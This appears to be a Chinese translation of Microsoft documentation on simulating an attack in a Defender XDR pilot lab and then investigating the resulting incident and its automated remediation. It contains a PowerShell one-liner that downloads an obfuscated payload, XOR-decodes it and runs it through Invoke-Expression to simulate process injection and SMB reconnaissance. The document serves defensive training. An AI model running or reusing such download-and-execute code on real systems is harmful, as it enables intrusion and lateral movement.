在 Microsoft Defender 全面偵測回應 試驗環境中執行攻擊模擬

本文是使用試驗環境在 Microsoft Defender 全面偵測回應 中執行事件調查和響應程式中的步驟 2 之 1。 如需此程式的詳細資訊，請參閱 概觀 文章。

準備試驗環境之後，您可以藉由建立具有模擬攻擊的事件，並使用 Microsoft Defender 入口網站來調查和回應，來測試 Microsoft Defender 全面偵測回應 的事件回應和自動化調查和補救功能。

Microsoft Defender 全面偵測回應 中的事件是相互關聯的警示和相關聯數據的集合，這些數據構成攻擊的故事。

Microsoft 365 服務和應用程式會在偵測到可疑或惡意事件或活動時建立警示。 個別警示提供有關已完成或進行中攻擊的寶貴線索。 不過，攻擊通常會對不同類型的實體採用各種技術，例如裝置、使用者和信箱。 結果是租使用者中多個實體的多個警示。

注意事項

如果您不熟悉安全性分析和事件回應，請參閱 回應您的第一個事件逐步解說 ，以取得分析、補救和事件后檢閱一般程序的導覽。

使用 Microsoft Defender 入口網站模擬攻擊

Microsoft Defender 入口網站具有內建功能，可在您的試驗環境中建立模擬攻擊：

• 攻擊模擬訓練 Office 365 的 Microsoft Defender 全面偵測回應。https://security.microsoft.com/attacksimulator

  在 Microsoft Defender 入口網站中，選 Email & 共同作業 > 攻擊模擬訓練。

• 攻擊教學課程 & 端點的 Microsoft Defender 全面偵測回應 模擬。https://security.microsoft.com/tutorials/simulations

  在 Microsoft Defender 入口網站中，選取 [端點>教學課程 & 模擬]。

適用於 Office 365 的 Defender 攻擊模擬訓練

適用於 Office 365 的 Defender Microsoft 365 E5 或 適用於 Office 365 的 Microsoft Defender 方案 2 包含網路釣魚攻擊的攻擊模擬訓練。 基本步驟如下：

1. 建立模擬

   如需如何建立和啟動新仿真的逐步指示，請參閱 模擬網路釣魚攻擊。

2. 建立承載

   如需如何建立承載以在模擬中使用的逐步指示，請參閱 建立攻擊模擬訓練的自定義承載。

3. 取得深入解析

   如需如何使用報告取得深入解析的逐步指示，請參閱 透過攻擊模擬訓練取得見解。

如需詳細資訊，請參閱 模擬。

適用於端點的Defender攻擊教學課程 & 模擬

以下是 Microsoft 的適用於端點的 Defender 模擬：

• 文件捨棄後門程式
• 自動調查 (後門)

有來自第三方來源的其他模擬。 另外還有一組教學課程。

針對每個模擬或教學課程：

1. 下載並閱讀所提供的對應逐步解說檔。

2. 下載模擬檔案。 您可以選擇在測試裝置上下載檔案或腳本，但這不是必要的。

3. 如逐步解說檔中的指示，在測試裝置上執行模擬檔案或腳本。

如需詳細資訊，請參閱透過模擬攻擊體驗 適用於端點的 Microsoft Defender。

使用隔離的域控制器和用戶端裝置 (選擇性) 來模擬攻擊

在此選擇性事件響應練習中，您將使用PowerShell腳本模擬獨立 Active Directory 網域服務 (AD DS) 域控制器和 Windows 裝置的攻擊，然後調查、補救及解決事件。

首先，您需要將端點新增至試驗環境。

新增試驗環境端點

首先，您需要將隔離的AD DS域控制器和 Windows 裝置新增至試驗環境。

1. 確認您的試驗環境租用戶已啟用 Microsoft Defender 全面偵測回應。

2. 確認您的網域控制器：

   • 執行 Windows Server 2008 R2 或更新版本。
   • 向 適用於身分識別的 Microsoft Defender 報告，並已啟用遠端管理。
   • 已啟用 適用於身分識別的 Microsoft Defender和 Microsoft Defender for Cloud Apps 整合。
   • 已在測試網域中建立測試使用者。 不需要系統管理員層級許可權。

3. 確認您的測試裝置：

   • 執行 Windows 10 1903 版或更新版本。
   • 已加入AD DS域控制器網域。
   • 已啟用 Microsoft Defender 防病毒軟體。 如果您無法啟用 Microsoft Defender 防病毒軟體，請參閱此疑難解答主題。
   • 已上線至 適用於端點的 Microsoft Defender。

如果您使用租使用者和裝置群組，請為測試裝置建立專用裝置群組，並將其推送至最上層。

其中一個替代方法是在 Microsoft Azure 基礎結構服務中將 AD DS 域控制器和測試裝置裝載為虛擬機。 您可以使用 模擬企業測試實驗室指南第 1 階段中的指示，但略過建立 APP1 虛擬機。

以下是結果。

您將模擬利用進階技術來隱藏偵測的複雜攻擊。 攻擊會列舉在域控制器上開啟的伺服器消息塊 (SMB) 工作階段，並擷取使用者裝置最近的IP位址。 此類攻擊通常不包含在犧牲者裝置上卸除的檔案，而且只會在記憶體中發生。 他們使用現有的系統和系統管理工具「即時存取」，並將其程式代碼插入系統進程中，以隱藏其執行。 這類行為可讓他們規避偵測並保存在裝置上。

在此模擬中，我們的範例案例會從 PowerShell 腳本開始。 在真實世界中，使用者可能會被誘騙執行腳本，或腳本可能會從先前受感染裝置的遠端連線到另一部計算機執行，這表示攻擊者嘗試在網路中橫向移動。 偵測這些腳本可能很困難，因為系統管理員通常也會從遠端執行腳本，以執行各種系統管理活動。

在模擬期間，攻擊會將殼層程式代碼插入看似無害的程式。 此案例需要使用 notepad.exe。 我們選擇此程式進行模擬，但攻擊者更可能以長時間執行的系統進程為目標，例如 svchost.exe。 殼層程式代碼接著會繼續連絡攻擊者的命令控制 (C2) 伺服器，以接收如何繼續的指示。 腳本會嘗試對域控制器執行偵察查詢， (DC) 。 偵察可讓攻擊者取得最近使用者登入資訊的相關信息。 一旦攻擊者擁有這項資訊，他們就可以在網路中橫向移動以取得特定敏感性帳戶

重要事項

如需最佳結果，請盡可能遵循攻擊模擬指示。

執行隔離的 AD DS 域控制器攻擊模擬

若要執行攻擊案例模擬：

1. 確定您的試驗環境包含隔離的AD DS域控制器和 Windows 裝置。

2. 使用測試用戶帳戶登入測試裝置。

3. 在測試裝置上開啟 Windows PowerShell 視窗。

4. 複製下列模擬文稿：

   [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
   ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
   $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
   $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
   $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
   

   注意事項

   如果您在網頁瀏覽器上開啟本文，在複製全文時可能會遇到問題，而不會遺失特定字元或引進額外的換行符。 如果是這種情況，請下載這份檔，並在 Adobe Reader 上開啟。

5. 在 PowerShell 視窗中貼上並執行複製的腳本。

注意事項

如果您使用遠端桌面通訊協定 (RDP) 執行 PowerShell，請在 RDP 用戶端中使用 [類型剪貼簿文字] 命令，因為 CTRL-V 快速鍵或滑鼠右鍵貼上方法可能無法運作。 最新版本的PowerShell有時也不會接受該方法，您可能必須先複製到記憶體中的記事本、將它複製到虛擬機中，然後貼到PowerShell中。

幾秒鐘之後，[記事本] 應用程式就會開啟。 仿真的攻擊碼會插入記事本中。 讓自動產生的記事本實例保持開啟，以體驗完整的案例。

仿真的攻擊程式代碼會嘗試與外部IP位址通訊， (模擬 C2 伺服器) ，然後嘗試透過SMB對域控制器進行偵察。

當此文稿完成時，您會在 PowerShell 控制臺上看到此訊息：

ran NetSessionEnum against [DC Name] with return code result 0

若要查看自動化事件和回應功能的運作方式，請保持開啟 notepad.exe 程式。 您會看到自動事件和回應停止記事本程式。

調查模擬攻擊的事件

注意事項

在逐步引導您完成此模擬之前，請先 watch 下列影片，以瞭解事件管理如何協助您在調查程式中將相關警示分段在一起、您可以在入口網站中找到這些警示，以及它如何協助您進行安全性作業：

切換至 SOC 分析師的觀點，您現在可以在 Microsoft Defender 入口網站中開始調查攻擊。

1. 開啟 Microsoft Defender 入口網站。

2. 從瀏覽窗格中，選 取 [事件 & 警示 > 事件]。

3. 模擬攻擊的新事件會出現在事件佇列中。

   

將攻擊調查為單一事件

Microsoft Defender 全面偵測回應 將分析相互關聯，並將來自不同產品的所有相關警示和調查匯總成一個事件實體。 如此一來，Microsoft Defender 全面偵測回應 會顯示更廣泛的攻擊案例，讓SOC分析師瞭解並回應複雜的威脅。

在此模擬期間產生的警示會與相同的威脅相關聯，因此會自動匯總為單一事件。

若要檢視事件：

1. 開啟 Microsoft Defender 入口網站。

2. 從瀏覽窗格中，選 取 [事件 & 警示 > 事件]。

3. 按兩下事件名稱左側的圓形，以選取最新的專案。 側邊面板會顯示事件的其他相關信息，包括所有相關的警示。 每個事件都有唯一的名稱，可根據它所包含警示的屬性來描述它。

   儀錶板中顯示的警示可以根據服務資源進行篩選：適用於身分識別的 Microsoft Defender、Microsoft Defender for Cloud Apps、適用於端點的 Microsoft Defender、Microsoft Defender 全面偵測回應、 和 適用於 Office 365 的 Microsoft Defender。

4. 選取 [開啟事件頁面 ] 以取得事件的詳細資訊。

   在 [ 事件 ] 頁面中，您可以看到與事件相關的所有警示和資訊。 資訊包括與警示相關的實體和資產、警示 (的偵測來源，例如 適用於身分識別的 Microsoft Defender 或 適用於端點的 Microsoft Defender) ，以及它們連結在一起的原因。 檢閱事件警示清單會顯示攻擊的進度。 在此檢視中，您可以查看並調查個別警示。

   您也可以從右側功能表單擊 [ 管理事件 ]、標記事件、指派給您自己，以及新增批註。

查看已產生的警示

讓我們看看模擬攻擊期間產生的一些警示。

注意事項

我們將只逐步解說模擬攻擊期間所產生的一些警示。 根據測試裝置上執行的 Windows 版本和 Microsoft Defender 全面偵測回應 產品，您可能會看到更多以稍微不同順序出現的警示。

警示： (來源觀察到可疑的進程插入：適用於端點的 Microsoft Defender)

進階攻擊者會使用複雜且隱秘的方法來保存在記憶體中，並從偵測工具中隱藏。 其中一個常見技術是從受信任的系統進程中操作，而不是惡意的可執行檔，讓偵測工具和安全性作業難以找出惡意代碼。

為了讓SOC分析師能夠攔截這些進階攻擊，適用於端點的 Microsoft Defender中的深層記憶體感測器為我們的雲端服務提供各種跨進程程式代碼插入技術的空前可見度。 下圖顯示如何偵測適用於端點的Defender，並在嘗試將程式代碼插入 至notepad.exe時發出警示。

警示：進程執行時所觀察到的非預期行為， (來源沒有命令行自變數：適用於端點的 Microsoft Defender)

適用於端點的 Microsoft Defender 偵測通常以攻擊技術最常見的屬性為目標。 這個方法可確保持久性，並引發攻擊者切換到較新策略的橫條。

我們採用大規模學習演算法，以建立組織內全球通用程式的正常行為，以及在這些程式顯示異常行為時 watch。 這些異常行為通常表示已引進無關的程式代碼，並且正在其他信任的進程中執行。

在此案例中， 程式notepad.exe 呈現異常行為，涉及與外部位置的通訊。 此結果與用來引進和執行惡意代碼的特定方法無關。

注意事項

因為此警示是以需要額外後端處理的機器學習模型為基礎，所以您可能需要一些時間才能在入口網站中看到此警示。

請注意，警示詳細數據包含外部IP位址，這是一個指標，可讓您用來作為展開調查的樞紐。

選取警示程式樹狀結構中的IP位址，以檢視IP位址詳細數據頁面。

下圖顯示選取的 [IP 位址詳細數據] 頁面， (按兩下 [警示程式] 樹狀結構中的 [IP 位址]) 。

警示：SMB) (來源 (使用者和IP位址偵察：適用於身分識別的 Microsoft Defender)

使用伺服器消息塊 (SMB) 通訊協定列舉可讓攻擊者取得最新的使用者登入資訊，協助他們橫向透過網路移動以存取特定敏感性帳戶。

在此偵測中，當SMB會話列舉針對域控制器執行時，就會觸發警示。

使用 適用於端點的 Microsoft Defender 檢閱裝置時間軸

探索此事件中的各種警示之後，請流覽回您稍早調查的事件頁面。 選取事件頁面中的 [裝置] 索引標籤，以檢閱 適用於端點的 Microsoft Defender 和 適用於身分識別的 Microsoft Defender 所報告的與此事件相關的裝置。

選取發生攻擊的裝置名稱，以開啟該特定裝置的實體頁面。 在該頁面中，您可以看到已觸發的警示和相關事件。

選取 [時程表] 索引標籤 以開啟裝置時間軸，並依時間順序檢視裝置上觀察到的所有事件和行為，並插入引發的警示。

擴充一些更有趣的行為可提供有用的詳細數據，例如進程樹狀結構。

例如，向下卷動，直到您發現 觀察到可疑進程插入的警示事件為止。 選 取插入powershell.exe notepad.exe 下方的進程 事件，以在側邊窗格的 [ 事件實體 ] 圖形下方顯示此行為的完整進程樹狀結構。 如有必要，請使用搜尋列進行篩選。

使用 Microsoft Defender for Cloud Apps 檢閱用戶資訊

在事件頁面上，選取 [ 使用者] 索引標籤，以顯示參與攻擊的用戶清單。 此數據表包含每個使用者的其他相關信息，包括每個使用者 的調查優先順序 分數。

選取使用者名稱以開啟使用者的配置檔頁面，以便進行進一步的調查。 深入瞭解調查有風險的使用者。

自動化調查與補救措施

注意事項

在逐步引導您完成此模擬之前，請先 watch 下列影片，以熟悉什麼是自動化自我修復、在入口網站中找到它的位置，以及它如何協助您的安全性作業：

在 Microsoft Defender入口網站中流覽回事件。 [事件] 頁面中的 [調查] 索引標籤會顯示由 適用於身分識別的 Microsoft Defender 和 適用於端點的 Microsoft Defender 觸發的自動化調查。 下列螢幕快照只會顯示適用於端點的Defender所觸發的自動化調查。 根據預設，適用於端點的 Defender 會自動補救佇列中找到的成品，這需要補救。

選取觸發調查的警示，以開啟 [調查詳細數據 ] 頁面。 您會看到下列詳細資料：

• 觸發自動化調查的警示 () 。
• 受影響的用戶和裝置。 如果在其他裝置上找到指標，也會列出這些額外的裝置。
• 辨識項清單。 找到並分析的實體，例如檔案、進程、服務、驅動程式和網路位址。 這些實體會進行分析，以瞭解警示的可能關聯性，並將其評等為良性或惡意。
• 找到威脅。 在調查期間找到的已知威脅。

注意事項

視時間而定，自動化調查可能仍在執行中。 請稍候幾分鐘，讓程式完成，然後再收集並分析辨識項並檢閱結果。 重新整理 [調查詳細數據 ] 頁面以取得最新的結果。

在自動化調查期間，適用於端點的 Microsoft Defender 識別出 notepad.exe 程式，其插入為其中一個需要補救的成品。 適用於端點的 Defender 會在自動化補救過程中自動停止可疑的進程插入。

您可以看到 notepad.exe 從測試裝置上執行的進程清單中消失。

解決事件

在調查完成並確認要補救之後，您就可以解決此事件。

從 [ 事件 ] 頁面，選取 [管理事件]。 將狀態設定為 [解決事件 ]，然後針對分類選取 [True 警示 ]，並選取 [ 安全性測試 ] 進行判斷。

當事件解決時，它會解決 Microsoft Defender 入口網站和相關入口網站中所有相關聯的警示。

這會包裝事件分析、自動化調查和事件解決的攻擊模擬。

下一步

步驟 2 之 2：嘗試 Microsoft Defender 全面偵測回應 事件回應功能

您可能需要的導覽

建立 Microsoft Defender 全面偵測回應 評估環境

提示

想要深入了解? Engage 技術社群中的 Microsoft 安全性社群：Microsoft Defender 全面偵測回應 技術社群。